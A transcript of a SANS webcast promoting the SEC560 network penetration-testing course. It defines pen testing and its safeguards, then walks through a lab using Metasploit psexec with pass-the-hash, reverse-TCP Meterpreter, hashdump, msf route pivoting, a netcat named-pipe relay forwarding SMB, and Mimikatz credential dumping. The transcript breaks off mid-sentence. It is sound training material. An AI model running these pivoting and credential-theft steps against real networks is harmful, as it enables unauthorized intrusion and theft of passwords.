SANS Pen Test Webcast – Adventures in High-Value Pen Testing: A Taste of SANS SEC560

Hello everyone, and welcome to today's webcast, Adventures in High-Value Pen Testing: A Taste of SANS Security 560, by Ed Skoudis. My name is Trevor and I will be moderating this webcast. Today's featured speaker is Ed Skoudis, SANS Pen Test curriculum lead. Before I turn things over to him: the Q&A portion will take place at the end of the webcast, so please feel free to submit your questions at any point by using the questions window. Right now I'd like to turn things over to Ed.

Thank you, Trevor, I really do appreciate it, and I'd like to thank everyone for joining us on this webcast. This webcast is one in a series of webcasts that SANS does that are often referred to as "a taste of" something, usually a SANS class, where we give you a sample of SANS course material so that you can integrate that kind of stuff into your own job. Today we're going to be focusing on a taste of SANS Security 560, which is a course focused on network pen testing, and my goal over the next hour or so is to give you some ideas that you'll be able to incorporate into your next pen test.

This webcast is sponsored by SANS Pen Test Austin. This is an event that we do at SANS; we're going to do it annually, it's the first time we've ever done it, and we're really excited about it. It's going to be really significant if you do anything that's associated with penetration testing or vulnerability assessment, whether you run those things yourselves or have to deal with the aftermath. From May 18th to May 23rd, mark your calendar; it's an important thing, we're going to do some cool stuff there. It will be in Austin, Texas, and we're going to have six offensively focused classes. We're going to have the SANS Security 560 class, I'm going to be teaching that there; we're going to have 504; the 401 class on cyber defense is going to be there; we have a whole bunch of really cool classes. The other thing is we're going to be doing some special stuff each evening. So we've got six fantastic classes for you to take. One of the evenings, well, actually three of the evenings, will be devoted to NetWars. So we're saying NetWars, NetWars, NetWars. This is SANS's challenge environment, it's a SANS cyber range really, and you'll be able to participate in it on three nights. Normally for a medium-sized or large-sized SANS event we only do NetWars for two nights; we do it here for three nights. And then one other night, there's a fourth night, we're going to be doing CyberCity. You see, we built a fully functional model city. It's an actual physical city, six feet by eight feet, but it's got real industrial control systems in it to control everything, including things like the power grid, traffic lights and so forth, and you're going to be hacking into the city as well as defending the city on one evening during this Pen Test Austin event.

We're also doing something called Coinapalooza; check that out. For each SANS course in pen testing we have a challenge coin that you can win, so there's a 504 coin, a 560 coin, there's a 542 coin, all these different coins for different SANS Pen Test courses. If you come to this Pen Test Austin event and you participate in NetWars over those three evenings, you have your chance to earn a whole bunch of SANS Pen Test coins. You can earn up to five SANS Pen Test coins, each coin a different one for a different class. We call it Coinapalooza; that's pretty cool. We're also going to have barbecue, that's just the nature of Austin, Texas, right? And we're going to do a lock-picking evening as well, so that's kind of a new and fun thing for SANS to do. I love picking locks. So we're throwing everything we can into this: you've got six great classes, you've got three nights of NetWars, you've got a night of CyberCity, you've got coins coming out of your ears in Coinapalooza, I'll be sitting there at a booth passing out those coins as you guys earn them based on your NetWars performance, and we've got barbecue. It's going to be cool. You might want to check it out in more detail; it's at sans.org/pentest2015. I hope you can make it; it's going to be a really cool event.

Let's go to the next slide. So the topic for this webcast is A Taste of SANS SEC560: Adventures in High-Value Penetration Testing, and the materials I'm going to go over with you are directly from the SANS Security 560 course. Some of you may have taken the course in the past; that's cool, you'll get to see some of the stuff that we've incorporated recently. If you've never taken the course, great, I'm going to give you some ideas that you can apply in your own jobs directly from the course itself. But let me introduce myself. Trevor did a short introduction a couple of minutes ago, but let me just go over this in some more detail. I wanted to have something kind of fun and quirky to introduce myself, so imagine that I could issue my own SSL certificates. Well, I suppose anybody can, right? The issue is whether the browser will trust it. Well, you'll see here at https://ed.skoudis (yes, it'd be nice to have your own top-level domain as well) that it's an HTTPS connection, and if you go to the details of the certificate it shows you what I'm all about. I'm a penetration tester, I'm an incident
handler. If you look at my career, it's focused very much on red teaming, penetration testing and using offense to help try to improve the defenses of our environment. I mean, that's what penetration testing should really be focused on; it's what I've really tried to zoom my career into. I'm also a SANS instructor and course author, I'm the Pen Test curriculum lead for SANS, and also the director of the NetWars and CyberCity projects. It's really an honor to be able to speak with you; thank you so much for your time.

Let's talk about the context of the SANS Security 560 course. You see, the SANS Security 560 course fits into the pen test curriculum like I show you here. We have the 504 course; maybe some of you have already taken that course, that's cool. It covers hacking attacks and incident handling, so it's a mixture of offense and defense. But then when you move into the pure-play offensive courses, you'll see SANS 560 is one of the first ones here. It's important to point out 504 is not a prerequisite for 560. You could start with 560 then go to 504, or vice versa; either way is fine. But 560 is one of the flagship pen testing courses for SANS because it covers the technologies, the tools, the mindset and the methodology for doing effective pen tests. That's what 560 is all about, and that's what this webcast is all about. Now, if you really get into this stuff you can then go from 560 into 660, which is advanced pen testing, and you can even go into deeper stuff like 760, which is advanced exploit development. It is insane; it's really an incredible class. It gets into things like writing exploits to defeat address space layout randomization, it gets into things like Windows kernel memory and manipulating that, the Linux heap, and a lot more. On the web app end we have 542 and 642, two great classes for web app pen testing. If you've got the foundations of penetration testing under your belt, like maybe you've taken 504 or 560 or 542, and you want to get some more hands-on stuff, we have the 561 and 562 classes. These are 80% hands-on, the 561 and 562 classes; the idea there is you understand the methodology already, you've got that down, you understand the tools, but you want to take your career to the next level with a whole bunch more hands-on. If you're more interested in learning how to tweak your tools and write new tools, we've got Python for Pen Testers, that's the 573 course. And if you're more into the mobile device and wireless side of things, we've got SEC575 for mobile device security and pen testing and 617 for wireless security and pen testing. So we've got a whole bunch of these different courses out there. If you have an idea for an additional SANS course, let me know, because part of my job as curriculum lead is to make sure we have courses that are useful to you in your career, so please do inform me. We also have some resources that you can see on the left-hand side of the slide here, but our focus here is going to be on the SANS 560 course.

Now, 560 is a six-day course and it consists of these parts. Section one is on comprehensive planning, scoping, rules of engagement and doing in-depth reconnaissance. 560.2 gets into in-depth scanning, so we go over all these different scanning options, scanning capabilities, so you can enumerate your attack surface. That's what 560.2 is all about: it's figuring out what the attack surface is so that you can then exploit it and pivot through it. 560.3 is about exploitation and what to do once you've successfully exploited it, and then once you get in there you can start doing things like password attacks and merciless pivoting; that's what day four is all about. Now, to be a really good network pen tester I think you really should have some pretty good skills on both the wireless and web app side of things, and that's reflected in the 560 course, because sometimes as a network pen tester you're called upon to evaluate the security of the wireless infrastructure, or oftentimes as a network pen tester you get called upon to look at web apps, and you need to be conversant in the most powerful tools and capabilities in those particular arenas. You see, from a philosophical perspective I do think that some pen testers have over-siloed themselves. There are some pen testers out there who say, look, I'm a really good network pen tester, that's what I focus on; or others say, I'm focused on wireless; or some others say, my deal is web apps, that's where I focus. Those are all well and good, you might want to choose an area to focus on, but if you are only focused on just those topics I think you're going to miss the big picture and not be as valuable. So the whole goal of the SANS Security 560 course is to get you ready to do a high-value penetration test: through scanning, through rules of engagement, through exploitation, through merciless pivoting, and yes indeed, doing wireless and web apps. The whole course finishes with a capstone, which is a full-day pen test. You work in teams of up to five people, you work your way through a capture-the-flag contest, and each person on the winning team gets that coin. Remember I mentioned
those coins earlier for Coinapalooza. If you take the class and you come in on the winning team you get that coin, and each of those coins has a cipher on it. So if I can go back a slide, you see we have these different coins here on the screen. You can see I'm pointing to my screen with my finger; obviously you can't see that. Each one of these is a coin, and the coin has a cipher on it. So the 560 coin, if you flip it over to the back, there's a cipher on it that you get to crack. 542 has a cipher on it, 504 has a cipher on it. Now, some of these ciphers are ancient, they're from thousands of years ago; others are old, maybe antique, they're from hundreds of years ago; some of them are from about, I don't know, say 70 years ago; and some other ones are ones that we created just for these specific coins. So you win the different coins by coming to Coinapalooza or winning the capstone of your class, and then you can crack those ciphers.

All right, so let's talk about the SANS Security 560 course and then start giving you some specific ways to think about your job as a pen tester and ways to do that job more effectively. So the focus, the relentless focus, of the SANS Security 560 course is to help you master the skills you need to be able to do an effective network pen test. It's organized around the workflow of pen testers, and that's what the whole thing is about. There are actually over 35 labs in the class, because we want to make it really hands-on, and if you average it all out and look at the amount of hands-on material in the class, it's about 45% hands-on. So there are lots of labs for you to do, like I said, over 35 of them, and it culminates in that full-day pen test on day six. So by the time you get out of the course you've covered all these different labs and all the concepts under those labs, done them all hands-on, and you've done a pen test as part of your team of five on day six. Additionally, the course includes tips for avoiding common pitfalls in pen testing. So we frequently say, well, you could do it this way and there's a chance that it could crash the target machine, or you could do it this way and it might take you three days or three months or three years, or you could do it this way and it'll go so much faster and it lowers the chance that you're going to crash target machines. So the course is really full of a whole bunch of those tips and tricks that I myself have learned over the years and put into the course, but I've also had so many different folks give me ideas and topics that I've incorporated into the course itself. I got some great tips and tricks from a whole bunch of different friends throughout the years that I baked into the course so we can all benefit from them.

All right, so let's take a step back now and do a formal definition of pen testing, and there's a method to my madness here. The reason I want to focus here on what pen testing is, is that there's a lot of confusion in the industry. Some people will call a vulnerability assessment a penetration test, and then when they ask for a pen test they get surprised when somebody's trying to exploit them. Or some people will call a pen test a vulnerability assessment, and they ask for a vulnerability assessment, and then when you don't actually start exploiting them they think you left something out. So we need to be clear and crisp in our terminology. To that end I offer you this formal definition of penetration testing, and this definition I'm about to give you, by the way, is compatible with, in fact identical to, the definition of penetration testing included in the SANS Critical Controls. Have you heard of the SANS Critical Controls project? It's essentially a baseline of security actions that you can do to radically improve the security of your infrastructure, and it includes penetration testing, and the section of the Critical Controls on pen testing has an identical definition to the one that you see here. I know it does because I wrote that section of the Critical Controls. But anyway, also if you look at other things that involve information security and penetration testing, you'll see that this is a compatible definition with what you'll see there. For example, NIST Special Publication 800-53 talks about all the different kinds of things you can do to have an effective security program, and you'll see the definition of penetration testing that I'm using here is compatible with their definition of security testing.

So what is the definition we're going to use here? Penetration testing involves modeling the techniques used by real-world computer attackers. If you're not using the techniques of real-world attackers, you're not really providing an effective pen test; you want to do what the real-world bad guys do, you're trying to model effective threat actors here. Well, what are you trying to do? You're trying to find vulnerabilities. Now, if I stopped right there we'd be doing a vulnerability assessment, and there's huge value in vulnerability assessment, don't get me wrong, I'm not here to dismiss vulnerability assessments. But pen testing goes further. It's not just about finding the vulnerabilities; it goes further so that, under controlled circumstances, you actually exploit the flaws that you discover. The word penetration is there for a reason: you're trying to penetrate the target environment, and you're doing this in a
manner that is professional. You want to do it as safely as you can, and you want to do it according to a good scope and really good rules of engagement. Now, SANS has put together scoping and rules of engagement documentation that you can download from the SANS Pen Test website; if you do a Google search on SANS pen test resources you can find that we've got these documents available there for you, and in the 560 class we walk you through creating an effective scope and rules of engagement. Now, why are you doing all this? You're trying to determine business risk and potential business impact. It's a huge thing. Your goal here is to help the organization improve security practices.

Now let me tell you about how my own thinking on the effectiveness of pen testing has evolved in the past five years. If you were to ask me five years ago, "Ed, why do you do pen testing?", one of the main things I would have said to you is so you can find flaws before the bad guys do and fix them. Now, that's still true, but I don't think it's the primary reason why you do pen testing. It is a reason, but not the primary reason. The primary reason you do pen testing is to help better understand your risk posture and then manage that risk posture. It's an important distinction; the two are not completely incompatible, but when you're doing a pen test, or even if you're not a pen tester and you're hiring somebody else to do pen testing for your organization, remember to focus, and keep those pen testers focused, on better understanding business risk. It's not merely finding flaws and checking boxes; instead, it's understanding risks so that you can use your precious limited resources to best mitigate the risks that you discover. Think about pen testing that way and you'll get more value out of it.

All right, well, why do we do this exploitation thing? I mean, I mentioned before vulnerability assessment is a good thing to do; why don't we just do that? You get a list of vulnerabilities, you mitigate against them, you're done. The fact is, exploitation, that crucial piece that differentiates a pen test from a vuln assessment, gives you more information. First of all, it helps you do false positive reduction, or maybe even elimination. It's hard for somebody to argue "we're not vulnerable" when I have shell on their target machine. It is worth noting, though, even if an exploit doesn't work you should still report on the discovery of a potential vulnerability. See, sometimes you'll be finding a vulnerability, a choice one, and you're trying to exploit it and it just won't work. It might not work because they have some mitigating control in place; maybe there's a host-based IPS or network-based IPS, intrusion prevention system, that blocks it, or maybe it's just the luck of the draw. You see, exploits typically work on a probabilistic basis. No exploit works a hundred percent of the time, even against a vulnerable system. Some exploits work ninety-five percent of the time, some work fifty percent of the time, some work five percent of the time. So even if an exploit doesn't work, I advise you to still include in your report the fact that you've discovered evidence of a vulnerability. You should say in your report you were unable to exploit it, but the organization should still look at that vulnerability and consider risk mitigation.

Now, the other reason we do exploitation is it's proof that the vulnerability is there and therefore a more realistic treatment of risk. Think about it this way. What if you were to tell the target organization that you found a massive vulnerability on a given machine on their DMZ, and you didn't exploit it because it's just a vulnerability assessment? So you found a vulnerability but no exploitation, you're not doing that, and you report that in, and the business decision makers look at that and they say, okay, what was on that machine, what sensitive stuff was there? And the answer is nothing, there's no sensitive information on that box. And they'll say, okay, well, you know, maybe in a month or six months we'll fix that one. Versus a penetration test: in the penetration test you found the same vulnerability that the vuln assessment found, but now you have a chance to exploit it, and you exploit that machine, you get on it, and you find it has no sensitive data, but you have shell on the box. Once you're on that machine on the DMZ you can then start looking around to see what other machines are nearby and maybe start attacking those. In fact, I'm going to give you an example from a lab in 560 where we pivot mercilessly through the target environment, so we can hack into one machine and from there we're going to hack into another machine and another machine, just spreading our way through the target organization. So you exploited that one box on the DMZ, found nothing on it, but you did find that it had a TCP connection to port 445 on another box. TCP 445, that's used for Server Message Block. So you decide to pivot from the one machine that you've conquered on the DMZ to another machine on TCP port 445, and when you get to that other box maybe you find 10 million credit cards, and you report that. Now what do you think the target organization is going to say when they discover that this critical vulnerability on this one machine, which
had no sensitive data, allowed you to pivot through the organization and find another machine where you were able to get access to ten million credit cards? You think they're going to say, oh, we'll fix that in a month or six months? No. You have now provided them more value; you've given them a better understanding of their risk, and they're going to mitigate it more effectively and more quickly. That's the big point here: using one machine as a pivot to get deeper inside the network. The way it might work is you, the pen tester, might exploit a machine on the DMZ, and from there you can attack other machines on the DMZ or pivot to get to an internal machine. Or, increasingly, you know what I like to do? I like to exploit a client-side machine, an internal box, and we have some labs in the SANS Security 560 course where we exploit internal machines and then from there pivot to other internal machines or even to a DMZ system. One thing that I find quite effective is exploiting that client machine using IPv4, right? Maybe I trick them into surfing to my website, I deliver back an exploit and I'm on that machine, and maybe I've exploited it via IPv4. From that machine I might start exploring the internal network, looking around with IPv6. We give you some tips for doing that in the 560 class, but for right now just remember you might exploit a machine over IPv4 and then, once you get on that machine, start looking around for IPv6 stuff, because it's often allowed on intranets, especially on just local area networks. A lot of people leave IPv6 enabled on their boxes but aren't as carefully filtering it or looking for attacks against it. And plus, exploitation leads to post-exploitation, which really helps you understand the business risks of the target organization. So that's why we do exploitation; that's the unique perspective that pen testing gives us.

Now, there are risks of exploitation. For example, when you exploit a target machine you could crash a service, so that service is just down. That's bad news. It could get even worse than that, though: you could crash the whole system, maybe a blue screen of death, or a kernel panic on, say, a Linux box, or something like that. That would be bad, but if I'm doing a pen test and something's going to come down, I'd rather have it come down right now, so that I can contact an emergency phone number at the target organization saying, look, the machine just came down, can you help fix it, versus impacting system stability or integrity. What I don't want to do is hit a system during a pen test, have it continue moving forward, kind of limping along in a hurt fashion, and then it crashes a day or a week or a month later. That's really bad news; I don't want that. Now, we're going to talk about some techniques for trying to minimize the chance of that happening, and I'm going to cover something I call the pen tester's pledge for you in just a couple of minutes. Now, there also could be data exposure with legal ramifications. As a pen tester you don't want to get in and download 10 million credit cards. When I talked earlier, on a previous slide, about getting access to 10 million credit cards, that's what I meant: you get access to those credit cards, but you don't want to download them, because then your system could well become the subject of attack and you're now responsible for protecting all that credit card information. As a pen tester you want to get in and measure what you have access to without actually downloading all that stuff. You don't want a million healthcare records, you don't want ten million credit cards, you don't want all this sensitive PII or PHI. You're measuring access, and you do that by sampling small amounts of it. We talk about some examples in the 560 class about how to sample things, like by sending in database queries that just count the number of rows in given tables, or counting the number of lines in a file, and more. Also, you could inadvertently access the wrong system. This is scary, dangerous stuff. IPv4 addresses aren't that big; it's easy to transpose two numbers, right? So for example, an IP address of 10.11.12.13 is very different than 10.11.21.13, right? You've just transposed those two numbers and that's a totally different system, maybe one that's not in your scope; it could be out of scope for the target organization, or maybe even a completely different organization. I'm not trying to scare you away from doing exploitation; it is a fine and wonderful thing to do in pen testing. I am trying to say, though, do it carefully, do it intelligently. Verify that exploitation is allowed in your rules of engagement; that should be defined up front in the pen test, and then double-check while you're working on the pen test, that is, tell them, hey, you're about to enter the exploitation phase. One of the things we really love to do in a pen test is have a daily debriefing with target system personnel, to say to them, hey, you know, here's what we accomplished today and here's what our plan is for tomorrow, and do that every day during the pen test. You don't want it to be a big burden, you don't want to spend an hour or two on your daily debriefings; it's about 10 or 15 minutes, just adding some transparency so that they can see what you're up to. And for one of your daily debriefings you might say, okay, we
finished our scanning phase and we're now moving into exploitation; here's what we plan to exploit. It's good to give them that heads-up. And always remember the probabilistic nature of exploit success. I mentioned it earlier here that some exploits work ninety-some percent of the time, others don't, and you need to understand that as you're doing it. Sometimes when we're doing the SANS 560 class somebody will run an exploit and it doesn't work, and they run it again and it doesn't work, and they run it a third time and it works, and they say to me, why did it work the third time? And I say, because the third time things all came together. In fact, with things like address space layout randomization, ASLR, the operating system vendors are trying to make it even more stochastic, even more pseudo-random, so that exploitation success is lower. But if we carefully choose our exploits we may be more likely to get successful execution.

Now I'd like to review a couple of tools for you here, and then I'm going to put them together in a scenario that we do in a lab for SANS 560, and I'll walk you through all the different piece parts so you can see how you can use that in your own environment. Now, one of the major tools we use in the 560 course is, of course, Metasploit, a fantastic tool for doing penetration testing. It does all kinds of things, but it includes an exploit arsenal. Now, Metasploit is available on a free basis; there's also a commercial implementation of Metasploit called Metasploit Pro. You use a Metasploit user interface like msfconsole, which gives you a Metasploit command prompt, to choose a given exploit, which might attack a target machine by exploiting a buffer overflow condition or exploiting some other problem in the target environment. So the exploit gives you code execution. It could be a client-side exploit, where you're going after a browser or Adobe Reader or the Java environment, or it could be a service-side exploit, where you're going after a listening service on the network. You take your user interface and you choose an exploit; you then choose a payload. The payload is the code you want to run over there, and one of the best payloads in Metasploit is the Meterpreter; it's a very full-featured command shell created for computer attackers. You choose your exploit, choose your payload, you apply them together and you launch them at the target. Now, Metasploit also includes things like auxiliary modules, which will scan for given services in a target environment, or do things like port scanning, or do things like fuzzing, with varied user input looking to see if they can cause some sort of crash condition or other unusual circumstance in the target environment. And then there are post modules, which you run after you've successfully exploited a target environment; that's post modules. Some of them will let you dump credentials, some will let you plunder the target environment; really, really useful stuff. So this is sort of the arsenal of different Metasploit piece parts.

But one of the most useful exploits in all of Metasploit is the psexec module. Now, PsExec was originally introduced by Mark Russinovich over at Microsoft Sysinternals; he did it a long time ago, well over a decade ago, but the folks at Metasploit have incorporated it into Metasploit itself. Now, it's completely separate code; it's not using the Sysinternals code at all. Instead they use a very similar concept, but they've written their own Metasploit code to do this, and it's fantastic. If you have SMB access to a target machine, that is, you're able to get into that target Windows box via Server Message Block, and you have admin credentials, such as an admin username and admin password, the psexec module lets you get code execution on the target box. Now, it's an exploit module, it's under exploit/windows/smb/psexec for Metasploit, but it feels weird calling it an exploit because it's just using built-in Windows capabilities, orchestrating those capabilities through a piece of code that comes with Metasploit. That's the psexec module, and the way it works is it establishes an SMB session to the target box. You choose that given RHOST, that's the thing you're trying to exploit, you define in Metasploit an SMBUser and SMBPass, that's the password, and then you exploit the target box and it runs a payload over there, such as the Meterpreter. The way it works is it'll make an SMB connection, and then across that SMB connection it writes an executable into the target's file system and then creates a service to run that executable. It runs that service, which launches the executable, which is usually a Metasploit payload like the Meterpreter, and then it automatically removes the executable and the service; it cleans up after itself. I should point out this is unlike the PsExec tool from Sysinternals; that tool from Sysinternals leaves the PsExec service behind. The Metasploit module cleans that up, which is pretty cool. Also, it supports pass-the-hash, so with Metasploit psexec you can authenticate with a username and password in the Administrators group, or a username and hash. This is one of the most useful exploits in all of Metasploit, that's why I put it in all caps here, especially if you're in a fully patched Windows internal network environment. And this leads to this concept I call the pen tester's pledge. The idea here is there's
a bunch of vulnerable code that runs on various machines, but if you were to launch, say, a buffer overflow exploit or a format string attack or some other kind of attack to get into a target piece of software, there's a chance you could crash the software, or maybe even cause a roomful of blue screens of death. That would be awful. My point here with this slide and the pen tester's pledge is, once you get access to a Windows environment, like, say, a given machine, dump the hashes from that environment, and then from there spread to other machines using psexec, because when psexec exploits a target machine it creates its own process. It actually will run its code out of a process called rundll32.exe, and if that process crashes you don't care, because it was created by the psexec execution itself, as opposed to exploiting, say, some vulnerability in IIS or VNC or some other listening service, or even some client. Once you get the hashes, spread through the target environment, lowering the risk of crashing target software; you can do that with psexec. So that got me thinking about one of these Despair posters. I'm sure you've seen the Despair posters, and I put one together with a roomful of blue screens of death, and I call it the pen tester's pledge. The pen tester's pledge works this way; I'll go ahead and take it for you here. I, Ed Skoudis (state your name), do hereby pledge to use psexec to exploit Windows target machines after I've gained admin credentials and SMB access to the target environment. So maybe you've gotten into a machine on the DMZ or on the internet and you've grabbed those credentials, and now you have SMB access to other machines. I shall forsake other service-side exploits thereafter; otherwise I unnecessarily risk crashing target systems. If you do a Google search for "pentester's pledge" you can download this if you want to have a copy of it. I was so excited, because when I originally put this together I tweeted it and Mark Russinovich himself retweeted it, so it was kind of neat; I had a little bit of a fanboy thing going there for a bit.

All right, additional capabilities and tools. Metasploit also includes the route command at the msfconsole prompt, and what I'm going to do is pull some things together in an example scenario. I'm going to walk you through a big scenario where we're going to use a bunch of the ideas we've been talking about here. So the first idea we've been talking about is psexec and how wonderful it is. The second idea: Metasploit has the route command, and with the route command at the msfconsole prompt I can implement a nice, convenient pivot. Check this out. By pivot I mean I can attack one machine and use that one machine's location in the network and its resources to attack another box. So what I'm going to do here is, at my Metasploit Framework console prompt, I'm going to use some exploit 1 and set some RHOST; this is my target machine, victim 1. I'm going to set some payload, this is the thing I want to run on the target, say Meterpreter, so I get to have a wonderful Meterpreter shell, and then I exploit it. So now I've gone from my pen tester's box and I've gotten a Meterpreter shell on victim 1. It gives me a little Meterpreter prompt. I can then background that prompt by either typing the background command or by hitting Ctrl-Z, and it'll say, do you want to background this? I type Y and it will background it, and it shows me my Meterpreter session ID. The Meterpreter session ID is just an integer that starts at 1 and goes up by one for each new session that you get. Then at my msf prompt, now listen carefully to this, at my msf prompt I can say route add, and then I can give it victim 2's subnet and then some subnet mask and a session ID number from my Meterpreter session with victim 1. What that tells Metasploit to do is, any new traffic I have that is destined for victim 2's subnet, I want that carried across the Meterpreter, so it will go from victim 1 into victim 2. As far as victim 2 is concerned, victim 1 has just
hacked him now the important point here well so what i could do is i could do use exploit – maybe it’s PS exact set your our host – victim to set your payload whatever payload you want and then exploit it and now Metasploit says i’ve got traffic destined for victim – i carried across my meterpreter session from victim one so it goes from victim 1 into victim 2 and this lets you pivot and you can make these things nested you can go from machine to machine to machine throughout the environment this way it’s very powerful but here is an important thing to remember don’t confuse the Metasploit framework console route command with the meterpreter route command this is something when we teach the 560 class I beg the students not to make a mistake with and when I’m begging them to say is don’t type route at the meterpreter prompt when you want to implement a pivot you can see route at the meterpreter prompt will let you manage the routing tables of victim 1 which is good unless you accidentally type in a bum route a bad route into victim 1 you’re going to destroy victim ones routing tables such that victim 1 might not be able to communicate with victim 2 and victim one might not even be able to communicate back with you so my point here is be very careful with the route command type it at the

Meterpreter prompt and you're going to change the routing tables of victim 1, most likely. If you want to implement a pivot, you're going to want to type the route command at the msf console prompt; msf prompt by itself, that implements a pivot. When you use the route command at the Meterpreter prompt, you're changing the routing tables.

All right, another topic that I wanted to just briefly describe to you is pivoting not using the Metasploit Framework console route command. That's cool, but another form of pivot is a netcat relay. We use them in 560 as well; we use msf route, and we also use this technique, this netcat relay. What I have here is an attacker machine, which might be a Windows box, could even be a Linux machine with some sort of SMB-speaking client software. Here I have a target Windows box, but let's say my attacker machine can't get direct access to the target box because it's firewalled. But there might be another machine, let's say it's a Linux box, maybe it's on a DMZ or even on an internal network, that I can gain access to. What I could do is run SMB client software on my own machine and set up a pivoting relay through this Linux box (let me go back a slide) to get access to that SMB service on the other side. You can do this with a traditional netcat relay, but I added, for the 560 class, a little twist to this relay. Watch what I'm going to do here. I'm going to use the mknod command, which is a Linux standard command, to create a special entity in the file system. I'm going to call that entity backpipe and I'm going to make it of type p; that means I want a named pipe. Named pipes are special things in Linux file systems; it means I can dump data into them, and the data that comes out is going to be in FIFO order: the first data that I dumped into the named pipe is going to be the first data that comes out, FIFO. Then I can implement a netcat relay to pivot SMB, which normally uses TCP port 445, this way. I'll say netcat listen (this is going to be on this Linux relay machine; most Linuxes include netcat by default), so netcat listen on local port 445. I'm going to skip over the 0<backpipe for just a second. Whatever data comes into this netcat listener when a TCP connection comes in, I'm going to pipe into a netcat client to shoot it to my target Windows machine; I'll say its IP address, 10.10.10.10, on port 445. That forwards the data in. Whatever data comes back from the target I pipe into tee. The Linux tee command is a very special command: what it will do is it displays on standard output any data that comes in on standard input, so this will display the SMB on the screen of where I'm running this listener-to-client relay. tee, in addition to putting stuff on the screen, will also write it into the file system, so it writes it into this pipe called backpipe. 0<backpipe means this netcat listener gets its standard input from the backpipe. So whatever the netcat client receives back will be dumped into the backpipe, forwarding it through the listener, so it makes a two-way relay: all data goes forward and all the responses come back. It's a traditional netcat relay, and it's a darn useful thing. Then on my attacker machine I can do net use; say it's a Windows box, I'm just going to make an SMB connection with backslash backslash and I give it my Linux machine's IP address, C$. So I'm actually mounting a share, and as far as my SMB client net use command is concerned, I'm actually going to my Linux machine, but my Linux machine is just forwarding that to the target Windows box. So it implements a beautiful pivot, and I could mount a share there with net use, or I could use psexec, whether it be Sysinternals psexec or Metasploit psexec, or I could grab hashes, all kinds of things. Very useful idea.

One additional idea I want to introduce you to before we get into the scenario is this: it's a tool called Mimikatz. You may have heard of it. It actually came out a couple of years ago and it's tremendously powerful. It was created by Benjamin Delpy, who also goes by the name gentilkiwi. Its focus is on pulling credentials from memory. It will search through the memory of Windows processes looking for LANMAN hashes, NT hashes and cleartext passwords, and it can pull them. I'm telling you, I work a lot on large-scale breach cases, and over the last 18 months there have been several big breach cases, ones that are written up in the newspaper, where the bad guys have used Mimikatz. And remember how I define pen testing: our job as pen testers is to use the tools, the techniques, the capabilities that real-world bad guys use. We want to mimic their activities. Bad guys are using Mimikatz; if we're going to mimic them well, we can use Mimikatz too. Now originally it was created as a separate executable, mimikatz.exe, that you'd have to push onto a Windows box, but now it's a Metasploit Meterpreter module. So once you get the Meterpreter loaded onto a target machine and running, maybe you got the Meterpreter running there by using psexec, you can then type load mimikatz. It extends the features of Meterpreter so now it's got Mimikatz commands,

and one of these commands is wdigest, which searches a specific area of LSASS memory to try to pull cleartext passwords. Really powerful. So what I'd like to do now, since I've given you those different ideas (we've talked about psexec, we've talked about the Meterpreter, talked about the msf console, we've talked about the route command at the msf console to pivot things, we've talked about netcat as a pivoting capability using netcat relays, and we talked about Mimikatz), let's pull them all together here. Now this is a lab that we do in SANS Security 560. We do it all hands-on there, but I want to walk you through step by step so you can see the scenario that a real pen tester would use to pivot mercilessly in a target organization. All right, so here's the scenario, and I really try in the class to illustrate these things graphically, because I think in pictures myself. I'm a product of the Macintosh, Sesame Street, visually oriented generation; maybe many of you are as well, and I like to think about these things visually. I also like to work at the command line, so I'm a visual guy who likes to work at the command line, and I think you'll see that in the 560 course, because of the way I do the command line stuff and a lot of figures that illustrate what's happening here. So the scenario here is you have a Linux box and you're running Metasploit. You've got a compromised machine on the DMZ; I'm not going to cover how we compromised that, because I want to keep us focused on the pivoting stuff, but you have shell on a DMZ target machine at 10.10.75.1. It's a Linux box. What you're going to do is create one of those netcat relays, so you're going to listen on inbound TCP port 4545, and whatever data comes in you're going to forward to target 1 on port 445. You're then going to use Metasploit psexec to get the Meterpreter running on this target Windows box by going through your Linux machine, and then get the Meterpreter prompt coming back, and then you'll do a hashdump on that. Once we've done that, we're then going to pivot using msf route to attack 10.10.10.20, but we'll do that a little bit later. So the first part here of this lab is to set up a netcat relay on our compromised Linux DMZ machine and then psexec through it, so we can get Meterpreter and hashes from the box.

All right, so we start by launching our Metasploit Framework console. Here I'm just running msfconsole, and it pulls up Metasploit, choosing from different ASCII artwork; I like the one that shows the Metasploit cow. And here I'm going to do use exploit/windows/smb/psexec, so this is the psexec module for Metasploit. Then I'm going to do service iptables stop. I want to turn off the firewall on my own Linux box; otherwise any reverse connections I have coming in, like my Meterpreter session that I want to be a reverse connection, will be blocked. So I'm turning off my firewall. I'm also assuming that I have a username and password for the target box. Remember, psexec requires SMB access and it requires an admin username and password (let me go back a couple of slides). So I've gotten those by maybe plundering the target environment or by doing password guessing. So I'm going to take that SMB session that I've set up using psexec, going through my compromised Linux box, to get the Meterpreter running on the target box and make a connection back to me on TCP port 80. The reason I'm doing TCP port 80 is many networks allow that outbound, right? So it's going to connect back to my own machine on TCP port 80, and I'm going to do a hashdump. All right, the reason I turned off my firewall is otherwise that TCP port 80 wouldn't be allowed back in. Cool. I've still got my firewall off; I've set my SMBUser, I've set my SMBPass. Now I show you the figure here again so you can see, illustratively, what we're doing here. I've got to set some Metasploit variables. I'm going to set my RHOST to my Linux target: I set my RHOST to 10.10.75.1, because this Linux machine is going to be attacking 10.10.75.1 on an RPORT of 4545. This is actually a wonderful capability of Metasploit psexec. Normally SMB just uses TCP port 445, but in Metasploit we've got more flexibility. The psexec module defaults to talking SMB over port 445, but what if I can't use port 445 on this Linux machine? It might be firewalled off; it might have some other service on it, like a Samba daemon. But as long as I can find any other port that I can listen on, I can set my RPORT for Metasploit to attack that port. So here I've just chosen 4545 as an example, but it could be something else; it could be any port that happens to be allowed into this Linux box where I could forward things through. I then set my payload to windows/meterpreter/reverse_tcp. I then set my LPORT to 80, so that when it communicates back it'll be communicating with port 80, and then I show my options just to review it. So what I've set up is psexec on Metasploit, so it'll exploit this Linux target (at least that's what it thinks it's going to exploit), where I've got a

